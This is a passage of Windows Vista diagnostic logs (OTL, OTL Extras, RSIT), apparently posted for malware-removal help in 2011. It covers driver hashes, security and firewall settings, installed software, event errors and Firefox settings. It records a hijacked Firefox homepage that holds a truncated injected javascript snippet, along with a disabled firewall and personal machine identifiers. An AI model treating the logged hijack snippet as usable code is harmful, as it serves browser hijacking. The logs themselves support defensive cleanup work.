22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6000.20598_none_b85cfa98dae9b436\AGP440.sys [2006-11-02 11:49:52 | 000,053,864 | ---- | M] (Microsoft 
Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys [color=#A23BEC]< MD5 for: ATAPI.SYS >[/color] [2008-01-19 09:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys [2006-11-02 11:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\drivers\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys [color=#A23BEC]< MD5 for: BEEP.SYS >[/color] [2008-01-19 07:49:10 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=67E506B75BD5326A3EC7B70BD014DFB6 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-beepsys_31bf3856ad364e35_6.0.6001.18000_none_c420a153079d485b\beep.sys [2006-11-02 10:51:03 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=AC3DD1708B22761EBD7CBE14DCC3B5D7 -- C:\Windows\System32\drivers\beep.sys [2006-11-02 10:51:03 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=AC3DD1708B22761EBD7CBE14DCC3B5D7 -- 
C:\Windows\winsxs\x86_microsoft-windows-beepsys_31bf3856ad364e35_6.0.6000.16386_none_c1e9df570ab23787\beep.sys [color=#A23BEC]< MD5 for: CDROM.SYS >[/color] [2008-01-19 07:49:51 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=1EC25CEA0DE6AC4718BF89F9E1778B57 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_cdrom.inf_31bf3856ad364e35_6.0.6001.18000_none_5fa95be2a3c76a4a\cdrom.sys [2006-11-02 10:51:44 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=8D1866E61AF096AE8B582454F5E4D303 -- C:\Windows\System32\drivers\cdrom.sys [2006-11-02 10:51:44 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=8D1866E61AF096AE8B582454F5E4D303 -- C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_e487f727\cdrom.sys [color=#A23BEC]< MD5 for: NDIS.SYS >[/color] [2006-11-02 11:51:42 | 000,500,840 | ---- | M] (Microsoft Corporation) MD5=227C11E1E7CF6EF8AFB2A238D209760C -- C:\Windows\System32\drivers\ndis.sys [2006-11-02 11:51:42 | 000,500,840 | ---- | M] (Microsoft Corporation) MD5=227C11E1E7CF6EF8AFB2A238D209760C -- C:\Windows\winsxs\x86_microsoft-windows-ndis_31bf3856ad364e35_6.0.6000.16386_none_a59069cb1f23fc44\ndis.sys [2008-01-19 09:43:31 | 000,529,464 | ---- | M] (Microsoft Corporation) MD5=9BDC71790FA08F0A0B5F10462B1BD0B1 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-ndis_31bf3856ad364e35_6.0.6001.18000_none_a7c72bc71c0f0d18\ndis.sys [color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color] [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\System32\winlogon.exe [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe [2008-01-19 09:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- 
C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 144 bytes -> C:\ProgramData\TEMP:CB0AACC9

< End of report >
[/log]

Extras:

[log]
OTL Extras logfile created on: 2011-07-18 10:25:13 - Run 1
OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr
Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation
Internet Explorer (Version = 7.0.6000.16982)
Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd

1,99 Gb Total Physical Memory | 1,00 Gb Available Physical Memory | 50,02% Memory free
4,21 Gb Paging File | 3,12 Gb Available in Paging File | 74,07% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 142,25 Gb Total Space | 46,21 Gb Free Space | 32,48% Space Free | Partition Type: NTFS

Computer Name: MAX-PC | User Name: Max | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: Off | File Age = 60 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]

[color=#E56717]========== File Associations ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = Opera.HTML] -- "C:\Program Files\Opera\Opera.exe" "%1"
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l

[HKEY_USERS\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

[color=#E56717]========== Shell Spawning ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
http [open] -- "C:\Program Files\Opera\Opera.exe" "%1"
https [open] -- "C:\Program Files\Opera\Opera.exe" "%1"
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[color=#E56717]========== Security Center Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 1
"InternetSettingsDisableNotify" = 1
"AutoUpdateDisableNotify" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[color=#E56717]========== System Restore Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]

[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{28EEAA2C-4990-4E47-8B55-4FC0F44A2C1A}" = lport=139 | protocol=6 | dir=in | app=system |
"{2CDEC398-5851-43AA-8F86-26CC9DA26C50}" = rport=139 | protocol=6 | dir=out | app=system |
"{2FC0FA4B-0D6A-4BED-9D0E-20527C61DEB4}" = lport=445 | protocol=6 | dir=in | app=system |
"{56ACE75E-935D-4AD4-B3C2-29DE2CA5A93B}" = rport=445 | protocol=6 | dir=out | app=system |
"{595B97A9-83DA-4EAC-9116-E81C37F7151F}" = rport=138 | protocol=17 | dir=out | app=system |
"{6B6A6309-617B-4795-9CAD-1F531C801EBD}" = lport=138 | protocol=17 | dir=in | app=system |
"{79845FDC-0136-4BFC-8B34-474905E4601F}" = rport=137 | protocol=17 | dir=out | app=system |
"{930A0E57-3817-4C5C-8B9A-D2C5B04608A7}" = lport=137 | protocol=17 | dir=in | app=system |
"{9FB1C863-C39E-439F-837B-657E25C7A2BF}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{BF8E882D-64B2-4B23-9A25-DD8008B4179A}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{2CAD9D8D-DC11-46B0-8BF5-21B97DF319D6}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{6D832A18-FADB-41C9-949C-653AA5D1FBEB}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{A7929FC4-2346-4FD7-ABA3-AB8FF2C9C118}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{C4F3D4D4-F12D-4CFC-ADB7-EC3E03B034A7}" = protocol=6 | dir=in | app=c:\program files\opera\opera.exe |
"{CB4DBF06-DA44-42C8-8453-673ED6028588}" = protocol=17 | dir=in | app=c:\program files\opera\opera.exe |
"{D0F9C983-A24D-4F33-9EA2-7AD2B669132E}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] "{03D1988F-469F-4843-8E6E-E5FE9D17889D}" = ThinkPad Bluetooth with Enhanced Data Rate Software 6.0.1.4900 "{0F4EFCE8-E358-4430-A504-F55F32BA1816}" = Client Security Solution "{1007F41F-7D69-468E-8017-3849A5A973C2}" = ThinkVantage Technologies Welcome Message "{1297C681-92D7-40EF-93BF-03F66EC5105C}" = ThinkPad EasyEject Utility "{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 "{296B2D8E-CE82-92AF-B2E8-A646E7CB78A2}_is1" = RegAlyzer "{2BD5C305-1B27-4D41-B690-7A61172D2FEB}" = Macromedia Flash 8 "{2DA85B02-13C0-4E6D-9A76-22E6B3DD0CB2}" = SymNet "{3248F0A8-6813-11D6-A77B-00B0D0160020}" = Java(TM) 6 Update 2 "{3672B097-EA69-4bfe-B92F-29AE6D9D2B34}" = Norton Internet Security "{399C37FB-08AF-493B-BFED-20FBD85EDF7F}" = Integrated Camera "{3CCAD2EF-CFF2-4637-82AA-AABF370282D3}" = ccCommon "{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis "{46A84694-59EC-48F0-964C-7E76E9F8A2ED}" = ThinkVantage Active Protection System "{48185814-A224-447A-81DA-71BD20580E1B}" = Norton Internet Security "{4843B611-8FCB-4428-8C23-31D0A5EAE164}" = Norton Confidential Browser Component "{4AB5764A-3894-49A2-BAA8-C4665F74CD4C}" = Registry patch to improve USB device detection on resume from sleep for Windows Vista "{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}" = Macromedia Extension Manager "{59F6A514-9813-47A3-948C-8A155460CC2A}" = RICOH R5C83x/84x Flash Media Controller Driver Ver.3.52.02 "{5AA2CD16-706F-41f3-87C5-2B5A031F2B3B}" = Norton Internet Security "{6280149E-EFF3-4F1B-BD43-5B7EDD6F620A}" = Lenovo Care Supplement "{65706020-7B6F-41F2-8047-FC69579E386A}" = Presentation Director "{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin "{72005434-30E9-49D9-A5E4-D1AE5D34DB71}" = Windows Live Toolbar "{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable "{77772678-817F-4401-9301-ED1D01A8DA56}" = SPBBC 32bit 
"{786547F9-59BB-4FA3-B2D8-327FF1F14870}" = Adobe Flash Player 9 ActiveX "{796E076A-82F7-4D49-98C8-DEC0C3BC733A}" = Diskeeper Home "{7E4C16B8-8F76-4940-8505-98E93C00BF19}" = Rescue and Recovery "{7EB114D8-207F-45AE-BABD-1669715F2630}" = ThinkVantage Access Connections "{830D8CBD-C668-49e2-A969-C2C2106332E0}" = Norton AntiVirus "{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable "{8675339C-128C-44DD-83BF-0A5D6ABD8297}" = System Update "{885A63EA-382B-4DD4-A755-14809B8557D6}" = Macromedia Flash Player 8 "{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight "{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}" = Macromedia Flash 8 Video Encoder "{90110415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003 "{90260415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office XP Web Components "{90A40415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components "{92AD5564-AFE0-4CED-B7D1-370896752872}" = ThinkPad Mobility Center Customization "{986F64DC-FF15-449D-998F-EE3BCEC6666A}" = Help Center "{9A129ABC-A53A-4209-A21E-D5DEDFB7CCA8}" = Norton Protection Center "{9EFDFBA8-9174-3C61-8645-28376C5CA994}" = Microsoft .NET Framework 3.5 Language Pack SP1 - plk "{AC76BA86-7AD7-1045-7B44-AA0000000001}" = Adobe Reader X - Polish "{B293806D-4407-4287-A00C-E9064174EF89}" = Network Magic "{B7C61755-DB48-4003-948F-3D34DB8EAF69}" = MSRedist "{BC4AE628-81A4-4FC6-863A-7A9BA2E2531F}" = Nokia Connectivity Cable Driver "{C6FA39A7-26B1-480A-BC74-6D17531AC222}" = Access Help "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1 "{CF52099A-3BEA-4C41-AEA8-1E190F04D737}" = Lenovo Care "{D353CC51-430D-4C6F-9B7E-52003DA1E05A}" = Norton Confidential Web Protection Component "{D6E6FA4A-5445-4850-8365-CF216C1CBB7A}" = Symantec Real Time Storage Protection Component "{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}" = ThinkPad Power Manager "{DB71210F-8314-4AE3-B7A7-EBAF85BD30E9}" = Wallpapers 
"{DBA4DB9D-EE51-4944-A419-98AB1F1249C8}" = LiveUpdate Notice (Symantec Corporation) "{E3EFA461-EB83-4C3B-9C47-2C1D58A01555}" = Norton Internet Security "{E5EE9939-259F-4DE2-8023-5C49E16A4F43}" = Norton Internet Security "{E7E836B8-4BDD-454F-82E6-5FEA17C83AD4}" = Message Center "{EFB5B3B5-A280-4E25-BE1C-634EEFE32C1B}" = AppCore "{F4DB525F-A986-4249-B98B-42A8066251CA}" = AV "33B90F7893A16FA92E149B05C5B46C501B4202CD" = Windows Driver Package - Lenovo (IBMPMDRV) System (05/31/2007 1.43) "4CF15B23EAB3D8AAA1E32F8ED986D8811D81835D" = Windows Driver Package - Intel System (09/15/2006 8.0.0.1008) "510EA369DBF270C677B57C6DBD41B0EB6B269FDB" = Windows Driver Package - Broadcom (b57nd60x) Net (05/09/2007 10.39.0.0) "530B366ABB8F4E0087E6FB2DE3609611DF9D8D27" = Windows Driver Package - Intel USB (09/15/2006 8.0.0.1008) "5B35493BBF3623E997EADC90AFF8AA66DF7A114F" = Windows Driver Package - Intel System (09/15/2006 8.2.0.1000) "67CCAA793684CADDDCD55BAD807632E611CA05D2" = Windows Driver Package - Intel (iaStor) hdc (02/12/2007 7.0.0.1020) "787E3A824531CE2DB2180F5CFAD00B052D0E389E" = Windows Driver Package - Intel System (09/15/2006 8.0.0.1010) "Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin "AIMP2" = AIMP2 "avast" = avast! 
Free Antivirus "AwayTask" = Maintenance Manager "CNXT_HDAUDIO" = Conexant HD Audio "CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_5045&SUBSYS_17AA20DA" = HDAUDIO Soft Data Fax Modem with SmartCP "DAEMON Tools Toolbar" = DAEMON Tools Toolbar "Dipmon" = Registry Patch of Enabling Device Initiated Power Management(DIPM) on SATA for Windows Vista "E40782D0B0D2A7F661A275F639A54DDA57386FB8" = Windows Driver Package - Intel hdc (12/06/2006 6.8.0.3002) "E6CEFD9A59425A2A27E92572AB367B28C371D3D8" = Windows Driver Package - Intel System (09/15/2006 7.0.0.1011) "FPIRPOn" = Registry patch of Changing Timing of IDLE IRP by Finger Print Driver for Windows Vista "HDMI" = Intel(R) Graphics Media Accelerator Driver "ipla" = ipla 2.3.3 "iPlus manager_is1" = iPlus manager 2.0 "KLiteCodecPack_is1" = K-Lite Codec Pack 4.2.5 (Standard) "Lenovo Registration" = Lenovo Registration "LENOVO.SMIIF" = Lenovo System Interface Driver "LiveUpdate" = LiveUpdate 3.2 (Symantec Corporation) "LudoRace" = LudoRace "McAfee Security Scan" = McAfee Security Scan Plus "Microsoft .NET Framework 3.5 Language Pack SP1 - plk" = Pakiet językowy programu Microsoft .NET Framework 3.5 z dodatkiem SP1 — PLK "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1 "Mozilla Firefox 5.0.1 (x86 pl)" = Mozilla Firefox 5.0.1 (x86 pl) "OnScreenDisplay" = On Screen Display "PC-Doctor 5 for Windows" = PC-Doctor 5 for Windows "PhotoScape" = PhotoScape "Picasa 3" = Picasa 3 "Power Management Driver" = ThinkPad Power Management Driver "SymSetup.{5AA2CD16-706F-41f3-87C5-2B5A031F2B3B}" = Norton Internet Security (Symantec Corporation) "ThinkPad FullScreen Magnifier" = ThinkPad FullScreen Magnifier "TrackPoint" = ThinkPad TrackPoint Driver "Trojan Remover_is1" = Trojan Remover 6.8.2 "USBPMon" = Registry patch for Windows Vista USB S3 PM Enablement "Windows Live Toolbar" = Windows Live Toolbar "WinRAR archiver" = Archiwizator WinRAR [color=#E56717]========== Last 10 Event Log Errors ==========[/color] [ Application Events ] Error - 
2011-07-10 17:57:10 | Computer Name = MAX-PC | Source = Application Hang | ID = 1002
Description = Program iexplore.exe w wersji 7.0.6000.16982 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania raportami i rozwiązaniami problemów. Identyfikator procesu: 900 Godzina rozpoczęcia: 01cc3f483ab38320 Godzina zakończenia: 64

Error - 2011-07-11 03:47:09 | Computer Name = MAX-PC | Source = Google Update | ID = 20
Description =

Error - 2011-07-11 15:49:48 | Computer Name = MAX-PC | Source = Google Update | ID = 20
Description =

Error - 2011-07-12 07:06:43 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd msxml3.dll, wersja 8.100.3501.0, sygnatura czasowa 0x4a801b45, kod wyjątku 0xc0000005, przesunięcie błędu 0x0005eec1, identyfikator procesu 0x1710, godzina rozpoczęcia aplikacji 0x01cc4083c0a0d140.

Error - 2011-07-12 08:18:09 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xef0, godzina rozpoczęcia aplikacji 0x01cc4087ac7d8ee5.

Error - 2011-07-12 08:19:26 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xb1c, godzina rozpoczęcia aplikacji 0x01cc408dd2cacc65.

Error - 2011-07-12 08:21:16 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xe5c, godzina rozpoczęcia aplikacji 0x01cc408e008985b5.

Error - 2011-07-12 08:22:30 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd msxml3.dll, wersja 8.100.3501.0, sygnatura czasowa 0x4a801b45, kod wyjątku 0xc0000005, przesunięcie błędu 0x0005eec1, identyfikator procesu 0x7cc, godzina rozpoczęcia aplikacji 0x01cc408e5a3228b5.

Error - 2011-07-13 05:34:32 | Computer Name = MAX-PC | Source = Application Hang | ID = 1002
Description = Program iexplore.exe w wersji 7.0.6000.16982 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania raportami i rozwiązaniami problemów. Identyfikator procesu: 958 Godzina rozpoczęcia: 01cc413fbcb54090 Godzina zakończenia: 43

Error - 2011-07-14 16:20:27 | Computer Name = MAX-PC | Source = Application Error | ID = 1000
Description = Aplikacja powodująca błąd wmplayer.exe, wersja 11.0.6000.6353, sygnatura czasowa 0x4aa91b5d, moduł powodujący błąd ole32.dll, wersja 6.0.6000.16386, sygnatura czasowa 0x4549bd92, kod wyjątku 0xc0000005, przesunięcie błędu 0x00041022, identyfikator procesu 0xb68, godzina rozpoczęcia aplikacji 0x01cc426283134c27.

[ System Events ]
Error - 2011-07-16 04:43:48 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026
Description =

Error - 2011-07-16 08:02:07 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000
Description =

Error - 2011-07-16 08:02:07 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026
Description =

Error - 2011-07-17 07:44:23 | Computer Name = MAX-PC | Source = EventLog | ID = 6008
Description = Poprzednie zamknięcie systemu przy 13:43:05 na 2011-07-17 było nieoczekiwane.

Error - 2011-07-17 07:45:17 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000
Description =

Error - 2011-07-17 07:45:17 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026
Description =

Error - 2011-07-17 09:50:59 | Computer Name = MAX-PC | Source = EventLog | ID = 6008
Description = Poprzednie zamknięcie systemu przy 13:45:15 na 2011-07-17 było nieoczekiwane.

Error - 2011-07-17 16:10:49 | Computer Name = MAX-PC | Source = EventLog | ID = 6008
Description = Poprzednie zamknięcie systemu przy 22:08:38 na 2011-07-17 było nieoczekiwane.

Error - 2011-07-17 16:11:42 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000 Description = Error - 2011-07-17 16:11:42 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026 Description = < End of report > [/log] RSIT: [log] Logfile of random's system information tool 1.09 (written by random/random) Run by Max at 2011-07-18 10:37:19 Microsoft® Windows Vista™ Home Premium System drive C: has 47 GB (32%) free of 146 GB Total RAM: 2038 MB (43% free) HijackThis download failed ======Scheduled tasks folder====== C:\Windows\tasks\Norton Internet Security - Uruchom pełne skanowanie systemu - Max.job C:\Windows\tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job C:\Windows\tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job =========Mozilla firefox========= ProfilePath - C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default prefs.js - "browser.startup.homepage" - "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script' prefs.js - "extensions.enabledItems" - "{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6, {20a82645-c095-46ed-80e3-08825760534b}:0.0.0, {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103, {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550, wrc@avast.com:6.0.1203, DTToolbar@toolbarnet.com:1.1.4.0024, {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.18" "{20a82645-c095-46ed-80e3-08825760534b}"=c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ "wrc@avast.com"=C:\Program Files\AVAST Software\Avast\WebRep\FF [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer] "Description"=Adobe® Flash® Player 10.1 Plugin "Path"=C:\Windows\system32\Macromed\Flash\NPSWF32.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@google.com/npPicasa3,version=3.0.0] "Description"=Picasa3 plugin "Path"=C:\Program Files\Google\Picasa3\npPicasa3.dll 
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] "Description"=Ag Player Plugin "Path"=c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/WPF,version=3.5] "Description"=Windows Presentation Foundation plug-in for Mozilla browsers "Path"=c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll C:\Program Files\Mozilla Firefox\extensions\ {972ce4c6-7e08-4474-a285-3208198ce6fd} C:\Program Files\Mozilla Firefox\components\ binary.manifest browsercomps.dll C:\Program Files\Mozilla Firefox\plugins\ np-mswmp.dll NPOFFICE.DLL nppdf32.dll WMP Firefox Plugin License.rtf WMP Firefox Plugin RelNotes.txt C:\Program Files\Mozilla Firefox\searchplugins\ allegro-pl.xml fbc-pl.xml google.xml merlin-pl.xml pwn-pl.xml wikipedia-pl.xml wp-pl.xml C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\extensions\ DTToolbar@toolbarnet.com nostmp {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} {E2883E8F-472F-4fb0-9522-AC9BF37916A7} C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\ daemon-search.xml 